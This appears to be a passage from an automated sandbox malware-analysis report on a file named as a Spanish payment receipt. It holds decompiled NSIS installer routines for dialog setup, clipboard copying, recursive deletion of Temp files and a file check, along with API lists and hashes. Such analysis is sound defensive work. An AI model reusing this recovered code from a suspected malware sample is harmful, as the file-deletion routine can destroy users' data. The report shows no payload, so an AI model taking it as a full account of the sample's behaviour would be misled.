                                        				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                        				if(_a8 >= 0) {
                                        					SendMessageW(_v8, 0x1001, 0, _a8);
                                        					SendMessageW(_v8, 0x1026, 0, _a8);
                                        				}
                                        				if(_a12 >= _t156) {
                                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                                        				}
                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                        				_push(0x1b);
                                        				E004041F4(_a4);
                                        				if(( *0x7a8a3c & 0x00000003) != 0) {
                                        					ShowWindow( *0x7a79f0, _t156);
                                        					if(( *0x7a8a3c & 0x00000002) != 0) {
                                        						 *0x7a79f0 = _t156;
                                        					} else {
                                        						ShowWindow(_v8, 8);
                                        					}
                                        					E00404229( *0x7a79e8);
                                        				}
                                        				_t168 = GetDlgItem(_a4, 0x3ec);
                                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                        				if(( *0x7a8a3c & 0x00000004) != 0) {
                                        					SendMessageW(_t168, 0x409, _t156, _a12);
                                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                                        				}
                                        				goto L36;
                                        			}





































                                        0x0040540a
                                        0x00405410
                                        0x0040541a
                                        0x0040541d
                                        0x004055ac
                                        0x004055b3
                                        0x004055d0
                                        0x004055d7
                                        0x004055d7
                                        0x004055dd
                                        0x004055ea
                                        0x00405608
                                        0x0040560a
                                        0x0040560b
                                        0x00405612
                                        0x00405668
                                        0x00405668
                                        0x0040566c
                                        0x00000000
                                        0x00000000
                                        0x0040566e
                                        0x00405671
                                        0x00405674
                                        0x00000000
                                        0x00000000
                                        0x0040567e
                                        0x00405684
                                        0x00405686
                                        0x00405689
                                        0x0040578b
                                        0x00000000
                                        0x0040578b
                                        0x00405698
                                        0x004056a3
                                        0x004056ac
                                        0x004056b3
                                        0x004056b7
                                        0x004056ba
                                        0x004056c3
                                        0x004056c9
                                        0x004056cc
                                        0x004056cc
                                        0x004056dc
                                        0x004056e2
                                        0x004056e4
                                        0x004056ed
                                        0x004056f0
                                        0x004056f7
                                        0x004056fe
                                        0x00405706
                                        0x00405706
                                        0x00405714
                                        0x0040571a
                                        0x0040571d
                                        0x0040571d
                                        0x00405724
                                        0x0040572a
                                        0x00405736
                                        0x0040573d
                                        0x00405746
                                        0x00405748
                                        0x0040574b
                                        0x0040575a
                                        0x0040575d
                                        0x00405763
                                        0x00405764
                                        0x0040576a
                                        0x0040576b
                                        0x0040576c
                                        0x0040576c
                                        0x00405774
                                        0x0040577f
                                        0x00405785
                                        0x00405785
                                        0x00000000
                                        0x004056e4
                                        0x00405614
                                        0x0040561a
                                        0x0040564a
                                        0x0040564c
                                        0x00405652
                                        0x00405654
                                        0x0040565a
                                        0x0040565d
                                        0x0040565d
                                        0x00405663
                                        0x00000000
                                        0x00405663
                                        0x0040561e
                                        0x00405628
                                        0x00000000
                                        0x004055ec
                                        0x004055ec
                                        0x004055f2
                                        0x0040562d
                                        0x00000000
                                        0x00405636
                                        0x004055fb
                                        0x00405600
                                        0x00405603
                                        0x00000000
                                        0x00405603
                                        0x004055ea
                                        0x00405423
                                        0x00405427
                                        0x0040542f
                                        0x00405433
                                        0x00405436
                                        0x00405439
                                        0x0040543c
                                        0x0040543f
                                        0x00405440
                                        0x00405441
                                        0x0040545a
                                        0x0040545d
                                        0x00405467
                                        0x00405476
                                        0x0040547e
                                        0x00405486
                                        0x0040548b
                                        0x0040548e
                                        0x0040549a
                                        0x004054a3
                                        0x004054ac
                                        0x004054ce
                                        0x004054d4
                                        0x004054e5
                                        0x004054ea
                                        0x004054f8
                                        0x00405506
                                        0x00405506
                                        0x0040550b
                                        0x00405519
                                        0x00405519
                                        0x0040551e
                                        0x00405521
                                        0x00405526
                                        0x00405532
                                        0x0040553b
                                        0x00405548
                                        0x00405557
                                        0x0040554a
                                        0x0040554f
                                        0x0040554f
                                        0x00405563
                                        0x00405563
                                        0x00405577
                                        0x00405580
                                        0x00405589
                                        0x00405599
                                        0x004055a5
                                        0x004055a5
                                        0x00000000

                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405460
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040546F
                                        • GetClientRect.USER32(?,?), ref: 004054AC
                                        • GetSystemMetrics.USER32(00000002), ref: 004054B3
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054D4
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054E5
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054F8
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405506
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405519
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040553B
                                        • ShowWindow.USER32(?,00000008), ref: 0040554F
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405570
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405580
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405599
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055A5
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040547E
                                          • Part of subcall function 00404229: SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237
                                        • GetDlgItem.USER32(?,000003EC), ref: 004055C2
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005396,00000000), ref: 004055D0
                                        • CloseHandle.KERNELBASE(00000000), ref: 004055D7
                                        • ShowWindow.USER32(00000000), ref: 004055FB
                                        • ShowWindow.USER32(0001038A,00000008), ref: 00405600
                                        • ShowWindow.USER32(00000008), ref: 0040564A
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040567E
                                        • CreatePopupMenu.USER32 ref: 0040568F
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056A3
                                        • GetWindowRect.USER32(?,?), ref: 004056C3
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056DC
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405714
                                        • OpenClipboard.USER32(00000000), ref: 00405724
                                        • EmptyClipboard.USER32 ref: 0040572A
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405736
                                        • GlobalLock.KERNEL32(00000000), ref: 00405740
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405754
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405774
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 0040577F
                                        • CloseClipboard.USER32 ref: 00405785
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
                                        • Instruction ID: afdd0f92e7f9204a51c28d187295685e71ab7a2983d4d38ccc6b07981ce020cc
                                        • Opcode Fuzzy Hash: 30a7d57daec831f4458769299bf5029d171b996c011ea2c71c6eb2cb9e30732f
                                        • Instruction Fuzzy Hash: 6CB16AB1800608FFDB119FA0DD89DAE7B79FB48354F00812AFA45BA1A0CB795E51DF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 436 40596d-405993 call 405c38 439 405995-4059a7 DeleteFileW 436->439 440 4059ac-4059b3 436->440 441 405b29-405b2d 439->441 442 4059b5-4059b7 440->442 443 4059c6-4059d6 call 40625f 440->443 444 405ad7-405adc 442->444 445 4059bd-4059c0 442->445 451 4059e5-4059e6 call 405b7c 443->451 452 4059d8-4059e3 lstrcatW 443->452 444->441 448 405ade-405ae1 444->448 445->443 445->444 449 405ae3-405ae9 448->449 450 405aeb-405af3 call 4065a2 448->450 449->441 450->441 460 405af5-405b09 call 405b30 call 405925 450->460 454 4059eb-4059ef 451->454 452->454 456 4059f1-4059f9 454->456 457 4059fb-405a01 lstrcatW 454->457 456->457 459 405a06-405a22 lstrlenW FindFirstFileW 456->459 457->459 461 405a28-405a30 459->461 462 405acc-405ad0 459->462 476 405b21-405b24 call 4052c3 460->476 477 405b0b-405b0e 460->477 464 405a50-405a64 call 40625f 461->464 465 405a32-405a3a 461->465 462->444 467 405ad2 462->467 478 405a66-405a6e 464->478 479 405a7b-405a86 call 405925 464->479 468 405a3c-405a44 465->468 469 405aaf-405abf FindNextFileW 465->469 467->444 468->464 472 405a46-405a4e 468->472 469->461 475 405ac5-405ac6 FindClose 469->475 472->464 472->469 475->462 476->441 477->449 481 405b10-405b1f call 4052c3 call 406025 477->481 478->469 482 405a70-405a79 call 40596d 478->482 487 405aa7-405aaa call 4052c3 479->487 488 405a88-405a8b 479->488 481->441 482->469 487->469 491 405a8d-405a9d call 4052c3 call 406025 488->491 492 405a9f-405aa5 488->492 491->469 492->469
                                        C-Code - Quality: 98%
                                        			E0040596D(void* __eflags, signed int _a4, signed int _a8) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				short _v556;
                                        				short _v558;
                                        				struct _WIN32_FIND_DATAW _v604;
                                        				signed int _t38;
                                        				signed int _t52;
                                        				signed int _t55;
                                        				signed int _t62;
                                        				void* _t64;
                                        				signed char _t65;
                                        				WCHAR* _t66;
                                        				void* _t67;
                                        				WCHAR* _t68;
                                        				void* _t70;
                                        
                                        				_t65 = _a8;
                                        				_t68 = _a4;
                                        				_v8 = _t65 & 0x00000004;
                                        				_t38 = E00405C38(__eflags, _t68);
                                        				_v12 = _t38;
                                        				if((_t65 & 0x00000008) != 0) {
                                        					_t62 = DeleteFileW(_t68); // executed
                                        					asm("sbb eax, eax");
                                        					_t64 =  ~_t62 + 1;
                                        					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
                                        					return _t64;
                                        				}
                                        				_a4 = _t65;
                                        				_t8 =  &_a4;
                                        				 *_t8 = _a4 & 0x00000001;
                                        				__eflags =  *_t8;
                                        				if( *_t8 == 0) {
                                        					L5:
                                        					E0040625F(0x7a3f28, _t68);
                                        					__eflags = _a4;
                                        					if(_a4 == 0) {
                                        						E00405B7C(_t68);
                                        					} else {
                                        						lstrcatW(0x7a3f28, L"\\*.*");
                                        					}
                                        					__eflags =  *_t68;
                                        					if( *_t68 != 0) {
                                        						L10:
                                        						lstrcatW(_t68, 0x40a014);
                                        						L11:
                                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                                        						_t38 = FindFirstFileW(0x7a3f28,  &_v604);
                                        						_t70 = _t38;
                                        						__eflags = _t70 - 0xffffffff;
                                        						if(_t70 == 0xffffffff) {
                                        							L26:
                                        							__eflags = _a4;
                                        							if(_a4 != 0) {
                                        								_t30 = _t66 - 2;
                                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                        								__eflags =  *_t30;
                                        							}
                                        							goto L28;
                                        						} else {
                                        							goto L12;
                                        						}
                                        						do {
                                        							L12:
                                        							__eflags = _v604.cFileName - 0x2e;
                                        							if(_v604.cFileName != 0x2e) {
                                        								L16:
                                        								E0040625F(_t66,  &(_v604.cFileName));
                                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                                        								if(__eflags == 0) {
                                        									_t52 = E00405925(__eflags, _t68, _v8);
                                        									__eflags = _t52;
                                        									if(_t52 != 0) {
                                        										E004052C3(0xfffffff2, _t68);
                                        									} else {
                                        										__eflags = _v8 - _t52;
                                        										if(_v8 == _t52) {
                                        											 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                        										} else {
                                        											E004052C3(0xfffffff1, _t68);
                                        											E00406025(_t67, _t68, 0);
                                        										}
                                        									}
                                        								} else {
                                        									__eflags = (_a8 & 0x00000003) - 3;
                                        									if(__eflags == 0) {
                                        										E0040596D(__eflags, _t68, _a8);
                                        									}
                                        								}
                                        								goto L24;
                                        							}
                                        							__eflags = _v558;
                                        							if(_v558 == 0) {
                                        								goto L24;
                                        							}
                                        							__eflags = _v558 - 0x2e;
                                        							if(_v558 != 0x2e) {
                                        								goto L16;
                                        							}
                                        							__eflags = _v556;
                                        							if(_v556 == 0) {
                                        								goto L24;
                                        							}
                                        							goto L16;
                                        							L24:
                                        							_t55 = FindNextFileW(_t70,  &_v604);
                                        							__eflags = _t55;
                                        						} while (_t55 != 0);
                                        						_t38 = FindClose(_t70);
                                        						goto L26;
                                        					}
                                        					__eflags =  *0x7a3f28 - 0x5c;
                                        					if( *0x7a3f28 != 0x5c) {
                                        						goto L11;
                                        					}
                                        					goto L10;
                                        				} else {
                                        					__eflags = _t38;
                                        					if(_t38 == 0) {
                                        						L28:
                                        						__eflags = _a4;
                                        						if(_a4 == 0) {
                                        							L36:
                                        							return _t38;
                                        						}
                                        						__eflags = _v12;
                                        						if(_v12 != 0) {
                                        							_t38 = E004065A2(_t68);
                                        							__eflags = _t38;
                                        							if(_t38 == 0) {
                                        								goto L36;
                                        							}
                                        							E00405B30(_t68);
                                        							_t38 = E00405925(__eflags, _t68, _v8 | 0x00000001);
                                        							__eflags = _t38;
                                        							if(_t38 != 0) {
                                        								return E004052C3(0xffffffe5, _t68);
                                        							}
                                        							__eflags = _v8;
                                        							if(_v8 == 0) {
                                        								goto L30;
                                        							}
                                        							E004052C3(0xfffffff1, _t68);
                                        							return E00406025(_t67, _t68, 0);
                                        						}
                                        						L30:
                                        						 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                        						return _t38;
                                        					}
                                        					__eflags = _t65 & 0x00000002;
                                        					if((_t65 & 0x00000002) == 0) {
                                        						goto L28;
                                        					}
                                        					goto L5;
                                        				}
                                        			}


















                                        0x00405977
                                        0x0040597c
                                        0x00405985
                                        0x00405988
                                        0x00405990
                                        0x00405993
                                        0x00405996
                                        0x0040599e
                                        0x004059a0
                                        0x004059a1
                                        0x00000000
                                        0x004059a1
                                        0x004059ac
                                        0x004059af
                                        0x004059af
                                        0x004059af
                                        0x004059b3
                                        0x004059c6
                                        0x004059cd
                                        0x004059d2
                                        0x004059d6
                                        0x004059e6
                                        0x004059d8
                                        0x004059de
                                        0x004059de
                                        0x004059eb
                                        0x004059ef
                                        0x004059fb
                                        0x00405a01
                                        0x00405a06
                                        0x00405a0c
                                        0x00405a17
                                        0x00405a1d
                                        0x00405a1f
                                        0x00405a22
                                        0x00405acc
                                        0x00405acc
                                        0x00405ad0
                                        0x00405ad2
                                        0x00405ad2
                                        0x00405ad2
                                        0x00405ad2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405a28
                                        0x00405a28
                                        0x00405a28
                                        0x00405a30
                                        0x00405a50
                                        0x00405a58
                                        0x00405a5d
                                        0x00405a64
                                        0x00405a7f
                                        0x00405a84
                                        0x00405a86
                                        0x00405aaa
                                        0x00405a88
                                        0x00405a88
                                        0x00405a8b
                                        0x00405a9f
                                        0x00405a8d
                                        0x00405a90
                                        0x00405a98
                                        0x00405a98
                                        0x00405a8b
                                        0x00405a66
                                        0x00405a6c
                                        0x00405a6e
                                        0x00405a74
                                        0x00405a74
                                        0x00405a6e
                                        0x00000000
                                        0x00405a64
                                        0x00405a32
                                        0x00405a3a
                                        0x00000000
                                        0x00000000
                                        0x00405a3c
                                        0x00405a44
                                        0x00000000
                                        0x00000000
                                        0x00405a46
                                        0x00405a4e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405aaf
                                        0x00405ab7
                                        0x00405abd
                                        0x00405abd
                                        0x00405ac6
                                        0x00000000
                                        0x00405ac6
                                        0x004059f1
                                        0x004059f9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004059b5
                                        0x004059b5
                                        0x004059b7
                                        0x00405ad7
                                        0x00405ad9
                                        0x00405adc
                                        0x00405b2d
                                        0x00405b2d
                                        0x00405b2d
                                        0x00405ade
                                        0x00405ae1
                                        0x00405aec
                                        0x00405af1
                                        0x00405af3
                                        0x00000000
                                        0x00000000
                                        0x00405af6
                                        0x00405b02
                                        0x00405b07
                                        0x00405b09
                                        0x00000000
                                        0x00405b24
                                        0x00405b0b
                                        0x00405b0e
                                        0x00000000
                                        0x00000000
                                        0x00405b13
                                        0x00000000
                                        0x00405b1a
                                        0x00405ae3
                                        0x00405ae3
                                        0x00000000
                                        0x00405ae3
                                        0x004059bd
                                        0x004059c0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004059c0

                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405996
                                        • lstrcatW.KERNEL32(007A3F28,\*.*), ref: 004059DE
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405A01
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405A07
                                        • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405A17
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB7
                                        • FindClose.KERNEL32(00000000), ref: 00405AC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-716068798
                                        • Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                        • Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
                                        • Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                        • Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004065A2(WCHAR* _a4) {
                                        				void* _t2;
                                        
                                        				_t2 = FindFirstFileW(_a4, 0x7a4f70); // executed
                                        				if(_t2 == 0xffffffff) {
                                        					return 0;
                                        				}
                                        				FindClose(_t2);
                                        				return 0x7a4f70;
                                        			}




                                        0x004065ad
                                        0x004065b6
                                        0x00000000
                                        0x004065c3
                                        0x004065b9
                                        0x00000000

                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00405C81,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420), ref: 004065AD
                                        • FindClose.KERNEL32(00000000), ref: 004065B9
                                        Strings
                                        • pOz, xrefs: 004065A3
                                        • C:\Users\user\AppData\Local\Temp\nsz62F8.tmp, xrefs: 004065A2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp$pOz
                                        • API String ID: 2295610775-3059712404
                                        • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                        • Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
                                        • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                        • Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
                                        • Instruction ID: 8bed64cdced8f5e888a37b1465862a95800e92f45c41cc099ab710eb89ed01f5
                                        • Opcode Fuzzy Hash: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
                                        • Instruction Fuzzy Hash: ABE09272E082008FD7549BA5AA4946D77B0EB84354720803FE112F11C1DA7848418F59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
